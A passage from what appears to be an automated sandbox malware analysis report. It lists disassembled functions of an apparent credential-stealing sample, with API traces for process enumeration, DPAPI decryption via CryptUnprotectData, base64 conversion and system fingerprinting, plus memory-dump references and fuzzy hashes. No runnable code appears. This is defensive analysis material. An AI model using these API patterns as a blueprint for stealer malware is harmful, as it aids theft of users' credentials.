                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: d01989869840e3164b0f4e9362ae98725cbe151edf83d1ade353a60aef107943
                                        • Instruction ID: 7d70e672911fa455a7946d20427398f7c5e7b7d262d4716ac32c2a8e4cc3925e
                                        • Opcode Fuzzy Hash: d01989869840e3164b0f4e9362ae98725cbe151edf83d1ade353a60aef107943
                                        • Instruction Fuzzy Hash: 3E312471901218ABCB24EB95CC95FEEB77CEB45700F1041A9F10AB61A0DF316A49CFA2
                                        Function 00CB8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00CA5184,40000001,00000000,00000000,?,00CA5184), ref: 00CB8EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 0fa851bc156581de5912cafb93890caff27adde213547be2344ef76a4d749141
                                        • Instruction ID: 2bab91edb241dfd50c84b5c02c55b512e7f159d8b6879dd06e9ecf89c1e35ebe
                                        • Opcode Fuzzy Hash: 0fa851bc156581de5912cafb93890caff27adde213547be2344ef76a4d749141
                                        • Instruction Fuzzy Hash: C9111874200209BFDB04CFA5D888FBB37ADAF89300F149458F9198B250DB35ED4ADB64
                                        Function 00CA9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: a0505fda432786deea4f23fc135543eafb90bf8877d800fca90bfbfd1dfe3dba
                                        • Instruction ID: 1115cd2fc245e0097e29550f5dc8849b58bbad96eb677895ed5d15f3ccc45300
                                        • Opcode Fuzzy Hash: a0505fda432786deea4f23fc135543eafb90bf8877d800fca90bfbfd1dfe3dba
                                        • Instruction Fuzzy Hash: 3311A2B4240208EFEB14CF64DC95FAA77B5FB89704F208058F9159F390C7B6AA45CBA4
                                        Function 00CB7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79B0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB79B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79C4
                                        • wsprintfA.USER32 ref: 00CB79F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 24563d6791b7ffc33462247603f96b9e547b3d15b2847b7c983bf277a6109709
                                        • Instruction ID: 56e98bd9fc6f7c6a3d222a63adea168f229dc774c39a8d84b30b45b281af13a4
                                        • Opcode Fuzzy Hash: 24563d6791b7ffc33462247603f96b9e547b3d15b2847b7c983bf277a6109709
                                        • Instruction Fuzzy Hash: 5C112AB2904158ABCB14DFCADD85BBEB7F8FB4CB11F14422AF605A2280E2395944C7B5
                                        Function 00CB7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009DEBE0,00000000,?,00CC0E10,00000000,?,00000000,00000000), ref: 00CB7A63
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009DEBE0,00000000,?,00CC0E10,00000000,?,00000000,00000000,?), ref: 00CB7A7D
                                        • wsprintfA.USER32 ref: 00CB7AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: a7a9f1853e4521cd719357920b4d25e188b40bedf995caee2bc2eb421cff5d27
                                        • Instruction ID: cce7383aad24f5e90af1b7df325b9e8e9e935d3fc967820078b357050bbba7c5
                                        • Opcode Fuzzy Hash: a7a9f1853e4521cd719357920b4d25e188b40bedf995caee2bc2eb421cff5d27
                                        • Instruction Fuzzy Hash: A4118EB1945218EFEB208F55DC49FA9BB78FB44721F1043AAF91AA72C0D7742A44CF51
                                        Function 0107417D Relevance: 5.9, Strings: 4, Instructions: 886COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .z}$qAo~$xeos$EkG
                                        • API String ID: 0-1606161968
                                        • Opcode ID: 6c186d96e562a94e9529ce3cffccd3211b99a2dda781c509901d562d7faa22d2
                                        • Instruction ID: 2ab2c9fe1d5e9e05afdcf82c15fa182aaab9bc442575895926b62b8bd7eb3bb2
                                        • Opcode Fuzzy Hash: 6c186d96e562a94e9529ce3cffccd3211b99a2dda781c509901d562d7faa22d2
                                        • Instruction Fuzzy Hash: CA425AF3A082109FE3046E2DEC8567ABBD9EF94760F1A893DEAC4C7744E5755C018792
                                        Function 00CB3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(00CBE118,00000000,00000001,00CBE108,00000000), ref: 00CB3758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00CB37B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 4e295b1b5fae0845782ec37e99b323c88510512b2945de0f9bb05e75de232526
                                        • Instruction ID: e4cd05ab30b3e7fc9eea53906eb116bd07215510680a1b4d645c7bee3b71ddbe
                                        • Opcode Fuzzy Hash: 4e295b1b5fae0845782ec37e99b323c88510512b2945de0f9bb05e75de232526
                                        • Instruction Fuzzy Hash: DD41F770A40A289FDB24DB58CC94BDBB7B5BB48702F4051D9E608EB2D0E771AE85CF51
                                        Function 00CA9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA9B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00CA9BA3
                                        • LocalFree.KERNEL32(?), ref: 00CA9BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 4c2b1d6e7317b4007a94edb1b0b12f579b523f1a4535de19738090554f8525b1
                                        • Instruction ID: 087221703145568a01ac806f27599db82a97cf23c7e6fa1111eac9df37f7bd80
                                        • Opcode Fuzzy Hash: 4c2b1d6e7317b4007a94edb1b0b12f579b523f1a4535de19738090554f8525b1
                                        • Instruction Fuzzy Hash: 2711C9B8A00209EFCB04DF94D989AAE77B5FF89304F1045A9F915AB350D770AE54CFA1
                                        Function 010753A2 Relevance: 4.1, Strings: 2, Instructions: 1617COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 4z3$Fip/
                                        • API String ID: 0-1922856788
                                        • Opcode ID: 6e0df2d47e4d477ab8afa0e2d878a0568f4b71576cbbfbe8a37368720b777e3a
                                        • Instruction ID: 2544725a0e86eb99ad1cfec873a00ae8f53fde2d366ee0c6ba7d6d7cf051a1f0
                                        • Opcode Fuzzy Hash: 6e0df2d47e4d477ab8afa0e2d878a0568f4b71576cbbfbe8a37368720b777e3a
                                        • Instruction Fuzzy Hash: E3B206F360C2049FE3046E2DEC8567ABBE9EFD4320F1A4A3DE6C4C7744EA7558058696
                                        Function 010283F5 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: CWO
                                        • API String ID: 0-159657330
                                        • Opcode ID: 84f4b6c47fe3a70e24b1284e97464f918b8dcef8ac1d4d4f136deb41ad7f598b
                                        • Instruction ID: 9634e602cb5a7a79e094d836a98f2ed4ed09b34a094b77dda882e366c02e92ce
                                        • Opcode Fuzzy Hash: 84f4b6c47fe3a70e24b1284e97464f918b8dcef8ac1d4d4f136deb41ad7f598b
                                        • Instruction Fuzzy Hash: 0C7145F3F083145BF304592AEC8476AB6CAEBE4320F1A863DAA98973C4E9794C054285
                                        Function 00FE523A Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: LMow
                                        • API String ID: 0-2764092925
                                        • Opcode ID: b4f187cbaeaf5cb9c28ee563d34b622893dd5136599ae92d6faf7528b9762cb8
                                        • Instruction ID: daa27f7367deae29f529b938f1baecf948ce307acffc9e2723bbd48639f42db0
                                        • Opcode Fuzzy Hash: b4f187cbaeaf5cb9c28ee563d34b622893dd5136599ae92d6faf7528b9762cb8
                                        • Instruction Fuzzy Hash: CB7127F3D086104BE3086E2DDC4576AFBE5EF94710F1B893DDAD993B84E939980186C6
                                        Function 0115463A Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
